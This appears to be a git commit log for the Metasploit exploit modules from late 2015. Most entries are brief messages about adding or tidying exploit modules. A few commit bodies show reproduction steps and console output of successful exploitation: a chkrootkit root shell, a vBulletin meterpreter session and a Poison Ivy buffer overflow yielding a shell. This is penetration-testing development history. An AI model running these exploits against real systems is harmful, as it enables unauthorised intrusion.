Commit Graph

9346 Commits (56fd5a745efe88e4449f79fc8fc3878822ed7cb4)

Author SHA1 Message Date
Jon Hart f8218f0536 Minor updates to print_ output; wire in handler_exists; 2015-11-18 11:05:10 -08:00
Jon Hart 392803daed Tighten up cleanup code 2015-11-18 11:05:10 -08:00
William Vu 657e50bb86 Clean up module 2015-11-18 12:50:57 -06:00
m0t c0d9c65ce7 always overwrite the payload file 2015-11-18 18:48:34 +00:00
wchen-r7 682a41af2e Update description 2015-11-18 11:52:50 -06:00
wchen-r7 d6921fa133 Add Atlassian HipChat for Jira Plugin Velocity Template Injection
CVE-2015-5603

Also fixes a bug in response.rb (Fix #6254)
2015-11-18 11:34:25 -06:00
sammbertram a484b318eb Update registry_persistence.rb 2015-11-18 16:13:18 +00:00
sammbertram 1fe8bc9cea Added a SLEEP_TIME option
Added a SLEEP_TIME options which is the number of seconds to sleep prior to executing the initial IEX request. This is useful in cases where a machine would have to establish a VPN connection, initiated by the user, after a reboot. 

Alternatively, as opposed to a sleep time, it could have a loop that attempts to retry for a certain period of item.
2015-11-18 11:17:57 +00:00
Jon Hart e21bf80ae4
Squash a rogue space 2015-11-17 14:17:59 -08:00
Jon Hart 3396fb144f
A little more simplification/cleanup 2015-11-17 14:16:29 -08:00
Jon Hart dcfb3b5fbc
Let Filedropper handle removal 2015-11-17 13:01:06 -08:00
jvoisin 44d477a13c Fix some rubocop warnings 2015-11-17 13:26:50 +01:00
Jon Hart 715f20c92c
Add missing super in setup 2015-11-16 14:45:13 -08:00
jvoisin 70407a4f21 3600 * 60 * 24 isn't one day 2015-11-16 23:18:02 +01:00
Jon Hart 902951c0ca
Clean up description; Simplify SOAP code more 2015-11-16 11:06:45 -08:00
Jon Hart 1aa1d7b5e4
Use random path for payload 2015-11-16 10:57:48 -08:00
Jon Hart ee5d91faab
Better logging when exploit gets 401 2015-11-16 10:41:48 -08:00
Jon Hart c4ffd7ae36
When sending SOAP requests, print out proto/status/message when fail 2015-11-16 10:38:40 -08:00
Jon Hart e58e17450a
Simplify XML building 2015-11-13 11:36:56 -08:00
Jon Hart ecbd453301
Second pass at style cleanup. Conforms now 2015-11-13 11:24:11 -08:00
Jon Hart 85e5b0abe9
Initial style cleanup 2015-11-13 10:42:26 -08:00
jvoisin 873994a154 Skip the explicit return
Thanks to kernelsmith for the feedback
2015-11-13 12:40:34 +01:00
Louis Sato 9a0f0a7843
Land #6142, uptime refactor 2015-11-12 16:58:55 -06:00
wchen-r7 ee25cb88b5
Land #6196, vBulletin 5.1.2 Unserialize Code Execution 2015-11-12 14:38:39 -06:00
wchen-r7 6077617bfd rm res var name
the res variable isn't used
2015-11-12 14:37:47 -06:00
wchen-r7 199ed9ed25 Move vbulletin_unserialize.rb to exploits/multi/http/
According to @all3g, this works on Windows too, so we will move
this to multi/http.
2015-11-12 14:36:01 -06:00
jvoisin 3566b978c3 Add a module for a chkrootkit-powered privsec
This modules implements an exploit for CVE-2014-0476,
to gain root thanks to chkrootkit.

Its main issues is that you need to wait until chkrootkit
is executed in a crontab (or manually),
which can take 24h top with its default setup.

How to reproduce:

1. Install a version < 0.50 of chkrootkit
2. Launch the local module
3. Wait until chkrootkit's crontab kicks in
4. You've got a root shell

```
msf > use exploit/linux/local/chkrootkit
msf exploit(chkrootkit) > check
[*] 192.168.1.25 - The target appears to be vulnerable.
msf exploit(chkrootkit) > run
[*] Exploit completed, but no session was created.

[*] Started reverse handler on 192.168.1.11:9999
msf exploit(chkrootkit) > [+] Target is vulnerable.
[!] Rooting depends of the crontab, this could take a while.
[*] Payload written to /tmp/update
[*] Waiting to chkrookit to be run be a cron tab...
[*] Command shell session 6 opened (192.168.1.11:9999 -> 192.168.1.25:40006) at 2015-11-06 20:53:00 +0100
[+] Deleted /tmp/update

msf exploit(chkrootkit) > sessions -i 6
[*] Starting interaction with 6...
id
uid=0(root) gid=0(root) groups=0(root)
```
2015-11-12 19:30:05 +01:00
m0t eae2d6c89d F5 module 2015-11-12 09:51:09 +00:00
wchen-r7 8ea0a864db Add a reference for patching 2015-11-10 23:32:22 -06:00
wchen-r7 66f3582991 Add Oracle Beehive prepareAudioToPlay Exploit Module 2015-11-10 23:05:11 -06:00
JT a0351133a6 Add more references to this exploit
Adding exploit-db doc about China Chopper webshell and details about this webshell in US-CERT.
2015-11-11 09:51:05 +08:00
HD Moore f86f427d54 Move Compat into Payload so that is actually used 2015-11-09 16:06:05 -06:00
m0t 66ed66cc81 Merge pull request #1 from m0t/changes
F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)
2015-11-09 16:11:29 +00:00
m0t daa999fb1c f5 module 2015-11-09 16:02:32 +00:00
m0t d4d4e3ddb0 f5 module 2015-11-09 13:41:59 +00:00
m0t 893c4cd52d f5 module 2015-11-09 13:10:54 +00:00
jvoisin e2678af0fe The modules now works on 5.1.X and 5.0.X
- Added automatic targeting
- Added support for 5.0.X
2015-11-07 14:28:25 +01:00
wchen-r7 0cc8165b52 And I forgot to rm the test line 2015-11-06 18:11:27 -06:00
wchen-r7 8f2a716306 I don't really need to override fail_with 2015-11-06 18:11:08 -06:00
wchen-r7 0213da3810 Handle more NilClass bugs 2015-11-06 18:08:51 -06:00
Jon Hart 43229c16e7
Correct some authors with unbalanced angle brackets 2015-11-06 13:24:58 -08:00
William Vu 2df149b0a5
Land #6189, extraneous Content-Length fix 2015-11-06 14:36:40 -06:00
William Vu 3cae7999aa Prefer ctype over headers['Content-Type'] 2015-11-06 14:36:21 -06:00
wchen-r7 f957acf9ba Fix Framework Rspec Failure
Needs to do:
include Msf::Exploit::Remote::HTTP::Wordpress
2015-11-06 13:56:05 -06:00
wchen-r7 fb9a40f15c
Land #6103, Add WordPress Plugin Ajax Load More Auth File Upload Vuln 2015-11-06 13:18:48 -06:00
wchen-r7 73f630b25a Note default.php 2015-11-06 13:18:24 -06:00
jvoisin f93f3397ec Fix some mistakes pointed by @wchen-r7 2015-11-06 19:35:22 +01:00
jvoisin c540ca763c Add the EDB id 2015-11-06 17:21:28 +01:00
jvoisin 7998955b46 The double-quote character is a badchar 2015-11-06 16:43:53 +01:00
jvoisin 30e7a35452 Add the possibility to target non-default path 2015-11-06 15:33:30 +01:00
jvoisin bb0e64e541 Implement a module for the recent vBulletin RCE
This module implements the recent unserialize-powered RCE against
vBulletin 5.1.X

Step to reproduce:

1. Install vBulletin 5.1.X
2. Launch the exploit against it

```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
```

```
msf exploit(vbulletin) > run

[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100

meterpreter > getuid
Server username: www-data (33)
```
2015-11-06 14:59:25 +01:00
wchen-r7 46fac897bd
Land #6144, China Chopper Web Shell (Backdoor) module 2015-11-05 18:29:36 -06:00
wchen-r7 ea22583ed1 Update title and description 2015-11-05 18:29:03 -06:00
wchen-r7 27be832c4c remove the fail_with because it's always triggering anyway 2015-11-05 18:19:46 -06:00
dmohanty-r7 a71d7ae2ae
Land #6089, @jvazquez-r7 Fix HTTP mixins namespaces 2015-11-05 16:56:41 -06:00
wchen-r7 038cb66937 Use the right module path 2015-11-05 16:16:46 -06:00
Brent Cook ee6d6258a5
Land #6180, add PSH as a target for psexec directly, implement autodetect 2015-11-05 10:38:50 -06:00
pyllyukko 4390fda513
Remove extra Content-Length HTTP header
The send_request_raw already sets the header and if it's set also in the
module, Metasploit sends the header twice.
2015-11-05 14:38:06 +02:00
William Vu 862dff964a Integrate psexec_psh into psexec 2015-11-04 17:31:33 -06:00
nixawk 109e9b6b6e remove debug info - require 'pry' 2015-11-03 06:52:11 +00:00
nixawk 46fe0c0899 base64 for evasion purposes 2015-11-03 06:42:52 +00:00
nixawk 6c16d2a1ca caidao's exploit module 2015-11-02 08:54:18 +00:00
William Vu 6a01efa394 Deprecate psexec_psh 2015-10-30 17:41:58 -05:00
Louis Sato 2bd792f693
remove .rb file extension 2015-10-30 15:26:45 -05:00
wchen-r7 82e600a53a Suggest the correct replacement for the deprecated module
The deprecated module has been suggesting the wrong replacement,
it should be exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
2015-10-29 16:24:29 -05:00
Louis Sato 57304a30a8
Land #6139, remove bad ref links 2015-10-29 16:00:43 -05:00
wchen-r7 95920b7ff6 Bring back more working links 2015-10-29 15:57:16 -05:00
wchen-r7 da52c36687 Put back some links 2015-10-29 15:48:47 -05:00
nixawk faf9be811a delete caidao_php_backdoor_exec from exploits 2015-10-29 02:18:30 +00:00
nixawk bc02993567 chinese caidao php backdoor command execution 2015-10-28 16:43:58 +00:00
wchen-r7 8757743821 Update description 2015-10-27 17:39:11 -05:00
wchen-r7 cfe9748962 Deprecate exploits/multi/http/uptime_file_upload
Please use uptime_file_upload_1.rb
2015-10-27 17:36:54 -05:00
wchen-r7 0c648eb210 Move to modules/exploits/multi/http/uptime_file_upload_2
This exploit is rather similiar to uptime_file_upload.rb, because
they both abuse post2file to upload. The difference is that this
module requires a priv escalation to be able to upload, and the
other one doesn't.
2015-10-27 17:31:31 -05:00
wchen-r7 592fdef93d Update uptime_code_exec 2015-10-27 17:29:55 -05:00
wchen-r7 5b86d2ef95 Fix #6133, update description, authors and references
Fix #6133

Thank you @japp-0xlabs
2015-10-27 14:38:18 -05:00
wchen-r7 154fb585f4 Remove bad references (dead links)
These links are no longer available. They are dead links.
2015-10-27 12:41:32 -05:00
William Vu 74353686a3
Land #6136, rescue SMB error for psexec 2015-10-27 09:31:37 -05:00
jvazquez-r7 b2e3ce1f8a
Allow to finish when deletion fails 2015-10-26 16:40:36 -05:00
wchen-r7 9adfd296a0
Land #6128, Th3 MMA mma.php Backdoor Arbitrary File Upload 2015-10-26 15:26:06 -05:00
wchen-r7 0d9ebe13a1 Modify check 2015-10-26 15:25:38 -05:00
wchen-r7 f4abc16c66
Land #6102, Add rsh/libmalloc privilege escalation exploit module 2015-10-26 10:54:05 -05:00
JT 4f244c54f8 Update mma_backdoor_upload.rb 2015-10-26 23:01:38 +08:00
Sam H 5fcc70bea4 Fixed issue w/ msf payloads + added timeout rescue
Apparently when OS X payload shells get a sudo command, it requires a full path (even though it clearly has $PATH defined in its env...) to that file. The updates here take that into account. Also, the script more directly catches a timeout error when the maximum time for sudoers file to change has passed.
2015-10-25 23:38:48 -07:00
JT ad80f00159 Update mma_backdoor_upload.rb 2015-10-24 11:16:49 +08:00
JT f461c4682b Update mma_backdoor_upload.rb 2015-10-24 11:15:26 +08:00
wchen-r7 181e7c4c75 Update metadata 2015-10-23 17:22:31 -05:00
wchen-r7 01c2641c6b Change print_* 2015-10-23 16:27:52 -05:00
wchen-r7 3c961f61a7 Modify check to use Nokogiri 2015-10-23 14:29:16 -05:00
wchen-r7 6f02cedff8 Move method create_exec_service 2015-10-23 13:10:00 -05:00
xistence f632dd8f67 Add Joomla Content History SQLi RCE exploit module 2015-10-23 17:25:44 +07:00
Ewerson Guimaraes (Crash) 2828653f8f Update uptime_code_exec.rb 2015-10-23 11:49:21 +02:00
Ewerson Guimaraes (Crash) 5539363218 Update uptime_code_exec.rb 2015-10-23 11:33:59 +02:00
JT be89cb32c9 Th3 MMA mma.php Backdoor Arbitrary File Upload 2015-10-23 08:47:40 +08:00
wchen-r7 360f40249c
Land #6122, user-assisted Safari applescript:// module (CVE-2015-7007) 2015-10-22 15:07:42 -05:00
wchen-r7 9d2e2df1f1 Update description 2015-10-22 15:07:11 -05:00
joev 35578c7292 Add refs. 2015-10-22 09:48:11 -05:00
joev 6a87e7cd77 Add osx safari cmd-R applescript exploit. 2015-10-22 09:46:56 -05:00
Sam H 348a0f9e3d Cleaned up "cleanup" method and crontab check
The script now searches for the full line "ALL ALL=(ALL) NOPASSWD: ALL" written in the crontab file to ensure that it is successful rather than just "NOPASSWD". Additionally, the required argument used in the cleanup method was removed and simply turned into an instance method so it could be accessed without needing to call it with any arguments.
2015-10-21 22:53:32 -07:00
William Vu 997e8005ce Fix nil http_method in php_include 2015-10-21 13:22:09 -05:00
William Vu 129544c18b
Land #6112, splat for ZPanel exploit 2015-10-21 13:07:51 -05:00
Boumediene Kaddour e188bce4c9 Update minishare_get_overflow.rb 2015-10-21 16:48:31 +02:00
wchen-r7 f06d7591d6 Add header for zpanel_information_disclosure_rce.rb 2015-10-20 16:19:44 -05:00
wchen-r7 70b005de7f
Land #6041, Zpanel info disclosure exploit 2015-10-20 16:08:16 -05:00
wchen-r7 728fd17856 Make code changes for zpanel_information_disclosure_rce.rb
Use Nokogiri and URI, as well as indent fixes and other things
2015-10-20 16:07:02 -05:00
Sam H 712f9f2c83 Deleted extra reference to exploit DB 2015-10-18 19:10:47 -07:00
Sam Handelman b03c3be46d Fixed some styling errors in the initializer. Switched the calls to sleep(1) to use the Rex API (Rex.sleep(1) instead). 2015-10-18 02:13:03 -07:00
Roberto Soares ba75e85eb3 Add WP Ajax Load More Plugin File Upload Vuln. 2015-10-17 13:30:36 -03:00
Sam Handelman 3757f2e8de Changed my author name to make sure it matches my GitHub username inside the module information. 2015-10-16 14:54:34 -07:00
Sam Handelman 95d5e5831e Adding the updated version of the module to submit a pull request. Changes were made to ensure that the OS version check correctly determines which systems are vulnerable, giving only a warning message if not. 2015-10-16 14:39:07 -07:00
jvazquez-r7 28ca34c40a
Fix conflicts 2015-10-16 15:38:59 -05:00
wchen-r7 c399d7e381
Land #5959, Add Nibbleblog File Upload Vuln 2015-10-16 15:30:13 -05:00
wchen-r7 9666660c06 Enforce check and add another error message 2015-10-16 15:29:12 -05:00
William Vu f14776ab63
Land #6092, refs for arkeia_agent_exec 2015-10-15 22:50:57 -05:00
William Vu 8cb6cc57b5
Land #6094, refs for another ManageEngine module 2015-10-15 22:49:05 -05:00
William Vu 86dfbf23e8 Fix whitespace 2015-10-15 22:48:53 -05:00
xistence 018b515150 Add CVE/URL references to manageengine_eventlog_analyzer_rce 2015-10-16 10:41:39 +07:00
xistence b1f2e40b98 Add CVE/URL references to module manage_engine_opmanager_rce 2015-10-16 10:36:13 +07:00
xistence 6a1553ae63 Add EDB/CVE/URL references to arkeia_agent_exec 2015-10-16 10:23:20 +07:00
jvazquez-r7 67820f8b61
Fix Packetstorm references 2015-10-15 12:42:59 -05:00
jvazquez-r7 4517270627
Fix modules using Msf::HTTP::JBoss 2015-10-15 11:49:15 -05:00
jvazquez-r7 cf9ddbb701
Update moduels using Msf::HTTP::Wordpress 2015-10-15 11:47:13 -05:00
William Vu bf9530d5ba
Land #5941, X11 keyboard exec module 2015-10-14 11:38:47 -05:00
Brent Cook 30d2a3f2a9
Land #5999, teach PSH web delivery to use a proxy 2015-10-14 11:05:45 -05:00
HD Moore d67b55d195 Fix autofilter values for aggressive modules 2015-10-13 15:56:18 -07:00
William Vu a4f0666fea
Land #6081, DLink -> D-Link 2015-10-12 18:05:52 -05:00
Tod Beardsley 185e947ce5
Spell 'D-Link' correctly 2015-10-12 17:12:01 -05:00
Tod Beardsley 336c56bb8d
Note the CAPTCHA exploit is good on 1.12. 2015-10-12 17:09:45 -05:00
HD Moore 6f3bd81b64 Enable 64-bit payloads for MSSQL modules 2015-10-11 12:52:46 -05:00
jvazquez-r7 ed0b9b0721
Land #6072, @hmoore-r7's lands Fix #6050 and moves RMI/JMX mixin namespace 2015-10-10 00:24:12 -05:00
jvazquez-r7 b9b488c109 Deleted unused exception handling 2015-10-09 23:38:52 -05:00
jvazquez-r7 c60fa496c7
Delete extra spaces 2015-10-09 23:37:11 -05:00
jvazquez-r7 e6fbca716c
Readd comment 2015-10-09 23:29:23 -05:00
jvazquez-r7 af445ee411
Re apply a couple of fixes 2015-10-09 23:24:51 -05:00
HD Moore a590b80211 Update autoregister_ports, try both addresses for the MBean 2015-10-09 20:20:35 -07:00
HD Moore 2b94b70365 Always connect to RHOST regardless of JMXRMI address 2015-10-09 17:49:22 -07:00
HD Moore cd2e9d4232 Move Msf::Java to the normal Msf::Exploit::Remote namespace 2015-10-09 13:24:34 -07:00
Tod Beardsley 94bb94d33a
Working URL for real 2015-10-09 15:07:44 -05:00
Tod Beardsley b04f947272
Fix blog post date, derp 2015-10-09 14:59:57 -05:00
Tod Beardsley 55ef6ebe91
HP SiteScope vuln, R7-2015-17
On behalf of @l0gan, already reviewed once by @jvazquez-r7, reviewed
again by me.

For details, see:

https://community.rapid7.com/community/metasploit/blog/2017/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection
2015-10-09 14:55:48 -05:00
jvazquez-r7 5e9faad4dc Revert "Merge branch using Rex sockets as IO"
This reverts commit c48246c91c, reversing
changes made to 3cd9dc4fde.
2015-10-09 14:09:12 -05:00
jvazquez-r7 347495e2f5
Rescue Rex::StreamClosedError when there is a session 2015-10-09 13:41:41 -05:00
brent morris 28454f3b2e MSFTidyness 2015-10-08 12:59:46 -04:00
wchen-r7 871f46a14e
Land #6038, ManageEngine ServiceDesk Plus Arbitrary File Upload 2015-10-07 15:17:58 -05:00
wchen-r7 dddfaafac7 Update reference 2015-10-07 15:17:22 -05:00
Christian Mehlmauer eb597bb9f3
Land #5842, watermark fileformat exploit 2015-10-07 19:29:04 +02:00
jakxx c5237617f2 Update buffer size for reliability 2015-10-06 18:12:40 -04:00
brent morris 5eff3e5637 Removed hard tabs 2015-10-02 14:34:00 -04:00
brent morris 4ee7ba05aa Removing hard tabs test 2015-10-02 14:31:46 -04:00
brent morris 6406a66bc0 Remove Ranking 2015-10-02 14:24:46 -04:00
brent morris 9f71fd9bfd Formatting ZPanel Exploit 2015-10-02 14:23:07 -04:00
brent morris 89a50c20d0 Added Zpanel Exploit 2015-10-02 13:29:53 -04:00
William Vu a773627d26
Land #5946, simple_backdoors_exec module 2015-10-02 11:18:29 -05:00
William Vu 5b8f98ee06
Land #6022, zemra_panel_rce module 2015-10-02 11:18:09 -05:00
Pedro Ribeiro 659a09f7d2 Create manageengine_sd_uploader.rb 2015-10-02 16:04:05 +01:00
jvazquez-r7 75d2a24a0a
Land #6019, @pedrib's Kaseya VSA ZDI-15-449 exploit 2015-10-02 08:51:28 -05:00
Pedro Ribeiro cbbeef0f53 Update kaseya_uploader.rb 2015-10-02 13:20:59 +01:00
JT 33916997a4 Update zemra_panel_rce.rb
revised the name and the description
2015-10-02 09:49:59 +08:00
JT fa1391de87 Update simple_backdoors_exec.rb
Updating the code as suggested
2015-10-02 07:53:15 +08:00
JT 501325d9f4 Update zemra_panel_rce.rb 2015-10-02 06:48:34 +08:00
jvazquez-r7 a88a6c5580
Add WebPges to the paths 2015-10-01 13:22:56 -05:00
jvazquez-r7 f9a9a45cf8
Do code cleanup 2015-10-01 13:20:40 -05:00
Hans-Martin Münch (h0ng10) 30101153fa Remove spaces 2015-10-01 18:56:37 +02:00
Hans-Martin Münch (h0ng10) 41cf0ef676 Add reference for CVE-2015-2342 - VMWare VCenter JMX RMI RCE 2015-10-01 18:43:21 +02:00
JT 2802b3ca43 Update zemra_panel_rce.rb
sticking res
2015-10-02 00:00:30 +08:00
William Vu 2ab779ad3d
Land #6010, capture_sendto fixes 2015-10-01 10:54:24 -05:00
JT 5c5f3a4e7f Update zemra_panel_rce.rb
called http_send_command right away :)
2015-10-01 23:39:36 +08:00
William Vu 0bacb3db67
Land #6029, Win10 support for bypassuac_injection 2015-10-01 10:17:34 -05:00
JT 66560d5339 Update zemra_panel_rce.rb 2015-10-01 19:16:23 +08:00
William Vu 2e2d27d53a
Land #5935, final creds refactor 2015-10-01 00:25:14 -05:00
OJ 7451cf390c Add Windows 10 "support" to bypassuac_injection 2015-10-01 11:16:18 +10:00
JT a7fa939fda Zemra Botnet C2 Web Panel Remote Code Execution
This module exploits the C2 web panel of Zemra Botnet which contains a backdoor inside its leaked source code. Zemra is a crimeware bot that can be used to conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.
2015-09-30 19:24:21 +08:00
JT 2de6c77fa2 Update simple_backdoors_exec.rb 2015-09-30 18:11:05 +08:00
jakxx 47c79071eb fix indention and typo 2015-09-29 22:41:36 -04:00
jakxx f18e1d69a1 Add x64 ret address and add to buffer 2015-09-29 22:36:30 -04:00
Pedro Ribeiro 61c922c24d Create kaseya_uploader.rb 2015-09-29 11:56:34 +01:00
JT 46adceec8f Update simple_backdoors_exec.rb 2015-09-29 10:40:28 +08:00
JT dd650409e4 Update simple_backdoors_exec.rb 2015-09-29 08:05:13 +08:00
bigendian smalls a47557b9c1
Upd. multi/handler to include mainframe platform
Quick update to multi handler so it recognizes mainframe platform based
modules
2015-09-28 11:14:08 -05:00
Jon Hart 96e4e883ae
Fix #6008 for wireshark_lwres_getaddrbyname_loop 2015-09-27 14:56:11 -07:00
Jon Hart bd2f73f40a
Fix #6008 for wireshark_lwres_getaddrbyname 2015-09-27 14:55:19 -07:00
Jon Hart bbd08b84e5
Fix #6008 for snort_dce_rpc 2015-09-27 14:53:40 -07:00
jvazquez-r7 b206de7708
Land #5981, @xistence's ManageEngine EventLog Analyzer Remote Code Execution exploit 2015-09-27 00:42:17 -05:00
jvazquez-r7 55f573b4c9
Do code cleanup 2015-09-27 00:33:40 -05:00
jvazquez-r7 c8880e8ad6
Move local exploit to correct location 2015-09-25 11:37:38 -05:00
jvazquez-r7 6b46316a56
Do watchguard_local_privesc code cleaning 2015-09-25 11:35:21 -05:00
jvazquez-r7 c79671821d Update with master changes 2015-09-25 10:47:37 -05:00
jvazquez-r7 e87d99a65f
Fixing blocking option 2015-09-25 10:45:19 -05:00
jvazquez-r7 890ac92957
Warn about incorrect payload 2015-09-25 10:10:08 -05:00
jvazquez-r7 19b577b30a
Do some code style fixes to watchguard_cmd_exec 2015-09-25 09:51:00 -05:00
jvazquez-r7 b35da0d91d
Avoid USERNAME and PASSWORD datastore options collisions 2015-09-25 09:36:47 -05:00
jvazquez-r7 52c4be7e8e
Fix description 2015-09-25 09:35:30 -05:00
JT e185277ac5 Update simple_backdoors_exec.rb 2015-09-24 14:14:23 +08:00
JT 56a551313c Update simple_backdoors_exec.rb 2015-09-24 13:54:40 +08:00
JT 192369607d Update simple_backdoors_exec.rb
updated the string 'echo me' to a random text
2015-09-24 13:49:33 +08:00
Meatballs 66c9222968
Make web_delivery proxy aware 2015-09-23 20:45:51 +01:00
Daniel Jensen 3dd917fd56 Altered the module to use the primer callback, and refactored some code to remove useless functions etc 2015-09-24 00:20:13 +12:00
William Vu d798ef0885
Land #5893, w3tw0rk/Pitbul RCE module 2015-09-23 02:41:01 -05:00
William Vu 8106bcc320 Clean up module 2015-09-21 14:37:54 -05:00
wchen-r7 fd190eb56b
Land #5882, Add Konica Minolta FTP Utility 1.00 CWD command module 2015-09-18 11:10:20 -05:00
wchen-r7 0aea4a8b00 An SEH? A SEH? 2015-09-18 11:09:52 -05:00
jvazquez-r7 ab8d12e1ac
Land #5943, @samvartaka's awesome improvement of poisonivy_bof 2015-09-16 16:35:04 -05:00
jvazquez-r7 af1cdd6dea
Return Appears 2015-09-16 16:34:43 -05:00
jvazquez-r7 402044a770
Delete comma 2015-09-16 16:23:43 -05:00
jvazquez-r7 75c6ace1d0
Use single quotes 2015-09-16 16:23:10 -05:00
jvazquez-r7 88fdc9f123
Clean exploit method 2015-09-16 16:14:21 -05:00
jvazquez-r7 d6a637bd15
Do code cleaning on the check method 2015-09-16 16:12:28 -05:00
wchen-r7 c7afe4f663
Land #5930, MS15-078 (atmfd.dll buffer overflow) 2015-09-16 15:33:38 -05:00
jvazquez-r7 37d42428bc
Land #5980, @xistence exploit for ManageEngine OpManager 2015-09-16 13:19:49 -05:00
jvazquez-r7 8f755db850
Update version 2015-09-16 13:19:16 -05:00
jvazquez-r7 1b50dfc367
Change module location 2015-09-16 11:43:09 -05:00
jvazquez-r7 122103b197
Do minor metadata cleanup 2015-09-16 11:41:23 -05:00
jvazquez-r7 aead0618c7
Avoid the WAIT option 2015-09-16 11:37:49 -05:00
jvazquez-r7 0010b418d0
Do minor code cleanup 2015-09-16 11:31:15 -05:00
jvazquez-r7 f3b6606709
Fix check method 2015-09-16 11:26:15 -05:00
Daniel Jensen 7985d0d7cb Removed privesc functionality, this has been moved to another module. Renamed module 2015-09-16 23:29:26 +12:00
Daniel Jensen bdd90655e4 Split off privesc into a seperate module 2015-09-16 23:11:32 +12:00
jvazquez-r7 24af3fa12e
Add rop chains 2015-09-15 14:46:45 -05:00
William Vu abe65cd400
Land #5974, java_jmx_server start order fix 2015-09-15 01:33:44 -05:00
xistence c99444a52e ManageEngine EventLog Analyzer Remote Code Execution 2015-09-15 07:29:16 +07:00
xistence 7bf2f158c4 ManageEngine OpManager Remote Code Execution 2015-09-15 07:24:32 +07:00
JT 9e6d3940b3 Update simple_backdoors_exec.rb 2015-09-13 23:30:14 +08:00
wchen-r7 ae5aa8f542 No FILE_CONTENTS option 2015-09-12 23:32:02 -05:00
Daniel Jensen 4e22fce7ef Switched to using Rex MD5 function 2015-09-13 16:23:23 +12:00
jvazquez-r7 0d52a0617c
Verify win32k 6.3.9600.17837 is working 2015-09-12 15:27:50 -05:00
jvazquez-r7 9626596f85
Clean template code 2015-09-12 13:43:05 -05:00
Hans-Martin Münch (h0ng10) 0c4604734e Webserver starts at the beginning, stops at the end 2015-09-12 19:42:31 +02:00
xistence dc8d1f6e6a Small changes 2015-09-12 13:08:58 +07:00
wchen-r7 01053095f9 Add MS15-100 Microsoft Windows Media Center MCL Vulnerability 2015-09-11 15:05:06 -05:00
jvazquez-r7 53f995b9c3
Do first prototype 2015-09-10 19:35:26 -05:00
wchen-r7 017832be88
Land #5953, Add Bolt CMS File Upload Vulnerability 2015-09-10 18:29:13 -05:00
wchen-r7 602a12a1af typo 2015-09-10 18:28:42 -05:00
Roberto Soares 68521da2ce Fix check method. 2015-09-10 04:40:12 -03:00
Roberto Soares 4566f47ac5 Fix check method. 2015-09-10 03:56:46 -03:00
Roberto Soares 0ba03f7a06 Fix words. 2015-09-09 21:27:57 -03:00
Roberto Soares bc3f5b43ab Removerd WordPress mixin. 2015-09-09 21:26:15 -03:00
Roberto Soares 4e31dd4e9f Add curesec team as vuln discovery. 2015-09-09 21:13:51 -03:00
Roberto Soares 6336301df3 Add Nibbleblog File Upload Vulnerability 2015-09-09 21:05:36 -03:00
Roberto Soares d3aa61d6a0 Move bolt_file_upload.rb to exploits/multi/http 2015-09-09 13:41:44 -03:00
Roberto Soares 2800ecae07 Fix alignment. 2015-09-09 01:21:08 -03:00
Roberto Soares 48bd2c72a0 Add fail_with method and other improvements 2015-09-09 01:11:35 -03:00
Roberto Soares f08cf97224 Check method implemented 2015-09-08 23:54:20 -03:00
Roberto Soares 6de0c9584d Fix some improvements 2015-09-08 23:15:42 -03:00
JT 31a8907385 Update simple_backdoors_exec.rb 2015-09-09 08:30:21 +08:00
jvazquez-r7 329e6f4633
Fix title 2015-09-08 15:31:14 -05:00
JT 4e23bba14c Update simple_backdoors_exec.rb
removing the parenthesis for the if statements
2015-09-08 15:47:38 +08:00
JT 002aada59d Update simple_backdoors_exec.rb
changed shell to res
2015-09-08 14:54:26 +08:00
JT 467f9a8353 Update simple_backdoors_exec.rb 2015-09-08 14:45:54 +08:00
JT 37c28ddefb Update simple_backdoors_exec.rb
Updated the description
2015-09-08 13:42:12 +08:00
JT 0f8123ee23 Simple Backdoor Shell Remote Code Execution 2015-09-08 13:08:47 +08:00
samvartaka 0a0e7ab4ba This is a modification to the original poisonivy_bof.rb exploit
module removing the need for bruteforce in the case of an unknown
server password by (ab)using the challenge-response as an encryption
oracle, making it more reliable. The vulnerability has also been confirmed
in versions 2.2.0 up to 2.3.1 and additional targets for these versions
have been added as well.

See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/
for details.

## Console output

Below is an example of the new functionality (PIVY C2 server password is
set to 'prettysecure' and unknown to attacker). Exploitation of versions 2.3.0 and 2.3.1
is similar.

### Version 2.3.2 (unknown password)

```
msf > use windows/misc/poisonivy_bof
msf exploit(poisonivy_bof) > set RHOST 192.168.0.103
RHOST => 192.168.0.103
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2>
```

### Version 2.2.0 (unknown password)

```
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.2.0 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.

msf exploit(poisonivy_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1
   1   Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1
   2   Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1

msf exploit(poisonivy_bof) > set TARGET 0
TARGET => 0

msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0>
```
2015-09-07 17:48:28 +02:00
xistence 1d492e4b25 Lots of X11 protocol changes 2015-09-06 15:55:16 +07:00
Ewerson Guimaraes (Crash) 944f47b064 Update
Check nil
Removed headers
